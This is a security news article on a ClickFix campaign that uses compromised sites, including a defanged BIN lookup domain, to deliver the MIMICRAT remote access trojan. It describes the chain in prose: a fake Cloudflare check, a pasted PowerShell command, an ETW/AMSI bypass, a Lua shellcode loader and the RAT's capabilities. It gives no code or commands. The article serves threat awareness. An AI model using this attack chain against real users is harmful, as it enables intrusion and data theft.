Cybersecurity researchers have published new findings on a ClickFix campaign that leverages compromised legitimate websites to distribute a previously unknown remote access trojan (RAT) named MIMICRAT (also tracked as AstarionRAT).
According to Elastic Security Labs, the operation showcases a notable degree of sophistication. Compromised sites across various industries and regions are used as the delivery network. The infection chain involves a multi‑stage PowerShell sequence that bypasses ETW and AMSI protections before deploying a Lua‑based shellcode loader. The final payload communicates over HTTPS (port 443) and uses HTTP profiles designed to imitate ordinary web analytics traffic.
Elastic describes MIMICRAT as a custom C++ RAT featuring Windows token impersonation, SOCKS5 tunneling, and 22 separate commands that enable extensive post‑exploitation activity. The campaign itself was identified earlier this month.
Researchers also noted overlaps between this operation and another ClickFix campaign reported by Huntress that ultimately leads to deployment of the Matanbuchus 3.0 loader, which then drops the same RAT. These similarities suggest the attackers may be pursuing ransomware deployment or data theft as final objectives.
The infection chain begins with bincheck[.]io, a legitimate Bank Identification Number (BIN) lookup service that was compromised. Attackers injected malicious JavaScript that loads an externally hosted PHP script. This script displays a fake Cloudflare verification page, prompting victims to copy and paste a command into the Windows Run dialog to bypass a fabricated verification issue.
That action triggers a PowerShell command that retrieves a second‑stage script from the attackers’ command‑and‑control (C2) server. This stage disables ETW logging and AMSI scanning, then drops a Lua‑scripted loader. In the final step, the Lua code decrypts and executes shellcode directly in memory, ultimately deploying MIMICRAT.
Once active, MIMICRAT communicates over HTTPS to its C2 server and can process nearly two dozen commands to manipulate processes and the file system, open an interactive shell, perform token operations, inject shellcode, and establish SOCKS proxy tunnels.
Elastic also highlighted the campaign’s broad targeting. The lure pages support 17 different languages, dynamically adjusting to the victim’s browser language. Confirmed victims include organizations in the U.S. and multiple users from Chinese‑speaking regions, suggesting wide‑ranging, opportunistic targeting.
Found this article interesting? Follow us on X(Twitter) ,Threads and FaceBook to read more exclusive content we post.
